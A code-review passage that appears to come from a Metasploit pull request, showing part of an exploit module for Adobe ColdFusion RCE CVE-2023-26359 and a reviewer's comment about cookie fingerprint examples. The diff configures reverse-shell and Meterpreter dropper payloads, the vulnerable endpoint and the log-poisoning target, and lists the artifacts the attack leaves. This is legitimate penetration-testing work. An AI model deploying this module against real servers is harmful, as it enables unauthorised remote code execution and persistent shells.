modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb

```diff
@@ -0,0 +1,335 @@
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Type' => :cmd,
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_perl'
+              }
+            },
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Type' => :dropper,
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'CmdStagerFlavor' => [ 'curl', 'wget', 'bourne', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            # The following artifacts will be left on disk:
+            # The compiled CFML class generated from the poisoned coldfusion-out.log (Note: the hash number will vary)
+            # * Windows: C:\ColdFusion2021\cfusion\wwwroot\WEB-INF\cfclasses\cfcoldfusion2dout2elog376354580.class
+            # * Linux: /opt/ColdFusion2021/cfusion/wwwroot/WEB-INF/cfclasses/cfcoldfusion2dout2elog181815836.class
+            # If a dropper payload was used, a file with a random name may be left.
+            # * Windows: C:\Windows\Temp\XXXXXX.exe
+            # * Linux: /tmp/XXXXXX
+            ARTIFACTS_ON_DISK,
+            # The following logs will contain IOCs:
+            # C:\ColdFusion2021\cfusion\logs\coldfusion-out.log
+            # C:\ColdFusion2021\cfusion\logs\exception.log
+            # C:\ColdFusion2021\cfusion\logs\application.log
+            IOC_IN_LOGS
+          ],
+          'RelatedModules' => [
+            'auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26359'
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8500),
+        OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),
+        OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']),
+        OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    # We cannot identify the ColdFusion version through a generic technique. Instead we use the Recog fingerprint
+    # to match a ColdFusion cookie, and use this information to detect ColdFusion as being present.
+    # https://github.com/rapid7/recog/blob/main/xml/http_cookies.xml#L69
```

Comment:
Do you have some examples of the cookie? We can update recog's definition [here](https://github.com/rapid7/recog/blob/5433de5d5fdba0eca3d12aef459dee5e929c37ed/xml/http_cookies.xml#L69-L72) - but example cookies will be useful, so the fingerprint regex can be verified against the examples list in CI

Current examples:

```xml
    <example cookie="CFTOKEN">CFTOKEN=f3863673461e83d7-8B854468-1866-DAAC-99FBB842C6018037;expires=Mon, 01-Aug-2050 01:05:45 GMT;path=/;HttpOnly;</example>
    <example cookie="CFCLIENT_FOO_CORP">CFCLIENT_FOO_CORP=preflanguage%3DEN%23; Expires=Wed, 12-Apr-2051 01:11:37 GMT; Path=/</example>
```